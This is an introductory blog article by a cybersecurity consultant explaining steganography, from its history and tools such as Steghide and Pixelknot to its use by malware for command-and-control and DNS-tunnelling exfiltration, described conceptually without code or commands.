Cryptography, which includes steganography, is a particular interest of mine. While nowadays most of the introductory codes are useful for understanding fundamentals, the mathematics involved in modern cryptography lend it more towards advanced courses and specialists.
I didn’t think it was worthwhile going into the Caesar Cipher, or mechanics of the Enigma code, in this article, but their steganography is still very relevant today and is the hardest form of cryptography to computationally detect and crack.
What is steganography?
Cryptography derives from kryptos (hidden, or secret) and graphein (writing). It includes a whole host of techniques, and one which standards out is steganography which comes from steganos, or covered. What makes steganography unique is that it is a technique of making information hard to find, not hard to read once found. There’s a common phrase in cyber security – ‘security by obscurity is no security at all’, and the concept goes back to 1851. Steganography challenges that idea by providing security only through obscurity.
Steganography is not so much a single technique, as a family of them, with new ones being added all the time. All of the techniques share one core concept, trying to hide a message. I’ve heard compelling arguments that Renaissance artists using symbolism in their works were practicing a form of steganography, and ideas like the language of flowers go back centuries. When children draw stick figures using semaphore as secret messages to each other, they are practicing steganography.
Modern steganography is dramatically more practical, and usually a lot more malicious, and comes in a few fundamental forms. It is used in malware command and control, data exfiltration, and the exchange of illicit information and material. If you do not know where to look, or what to look at it is frighteningly hard to detect. When the hidden message is effectively encrypted, there is very little that can be done.
Steganographic messages can be hidden in audio, video, or images with simple, free tools that can be downloaded and run on a mobile phone by anyone. While it is an inefficient method, as the carrier message must be significantly larger than the hidden message, in today’s high-bandwidth world of social media that inefficiency is not an issue. A steganographic message for exfiltration of data can also be hidden through tunnelling different protocols – a popular method being the use of the domain name system (DNS) queries, allowed through almost all firewalls, to exfiltrate data or infiltrate command and control messages into an existing infection. As the internet, as we know it, relies almost completely on DNS to work, blocking this is challenging. Methods do exist to detect and protect against this vector, but they are hardly ever deployed.
First, we’ll look at the more human side, by embedding messages into media files.
Steganography Tools
One of the best ways to understand the human side of steganography is to try out some steganography tools. Steghide is one open-source tool that will encode a message into almost any media file you care to name, protected by a passphrase and an additional layer of encryption. At the recipient end, or on your own system, you can extract the data equally easily. Pixelknot for Android, and Pictography for iPhone, are similar smartphone-based systems.
While steganography does have a sinister side, the difficulty of detecting it does make it highly suitable for a lot of benevolent purposes. Any time someone is under electronic surveillance, if they have a pattern of activity including social media postings and a previously established protocol, uploading a selfie with a steganographically encoded message is a simple, fairly secure, and quick way to communicate. This has been used in practice across the world, including for journalistic reporting from areas with surveillance-heavy authorities. In fact, Pixelknot, the Android steganography tool, was developed as part of the Guardian project as part of their mission to support activists, journalists, and humanitarian organisations.
Malware and Steganography
One of the biggest problems for sophisticated malware is communications – it is when reaching out to, or receiving messages from, Command and Control (C2) systems that malware infections are easiest to detect and at their most vulnerable to disruption. Many of the largest botnets taken down have been disrupted in exactly this way, with white hats detecting the method for contacting their C2 infrastructure and either compromising it in turn (then sending out a self-destruct message, which is not as cinematic as it sounds), or breaking it through other means.
The most sophisticated modern malware makes heavy use of steganography not just for C2 purposes, it is also used to exfiltrate bulk data. The C2 side can vary from social media postings (Twitter is fairly popular for this, and I suspect there will be campaigns picked up on Instagram before long), through tunnelling protocols. It’s the tunnelling protocols we’ll take a brief look at now.
Tunnelling Protocols
At a basic level, a tunnelling protocol allows data to be sent from one network to another. That data can in turn be a tunnelling protocol. There are some amusing implementations of this, for example, the underlying protocol that provides most modern networking, TCP/IP, has been implemented using Facebook chat (which gave it very high latency and low reliability), and carrier pigeon (high latency, medium reliability, huge bandwidth).
DNS tunnelling is the most common and well known steganographic tunnelling method used by threat actors. DNS works through queries sent up a hierarchy of servers to resolve domain names to server or service addresses, and these queries are forwarded as needed. To use DNS tunnelling an attacker does not need any special relays inside a network, these are all provided as part of the legitimate network infrastructure. All that is needed is a malicious authoritative server for a domain or domains – queries are then sent for that domain, carrying the data as part of the query. The server receiving the query will then reply with a return message – and any networking protocol can be encoded through this. Tools are available for DNS tunnelling not only for data exfiltration, but instant messaging, video conferencing, and almost any other protocol that is available normally.
In 2016 Infoblox found 40% of malicious software they tested made some use of DNS tunnelling – in the years since this will likely have grown as open-source and off-the-shelf toolkits have become available. Highly sophisticated attacks, including ones suspected to be sponsored by nation-states, use DNS tunnelling for data exfiltration and C2.
It is perfectly possible to detect and/or prevent DNS tunnelling, but it is part of the suite of cyber security hygiene measures that are very rarely implemented due to lack of resources, lack of funds, lack of awareness, or a combination of the three.
Cybersecurity Series: Introduction to Steganography
By: James Bore
James Bore is an independent cybersecurity consultant, speaker, and author with over a decade of experience in the domain. He has worked to secure national mobile networks, financial institutions, start-ups, and one of the largest attractions’ companies in the world, among others. If you would like to get in touch for help with any of the above, please reach out at james@bores.com
Leave a Reply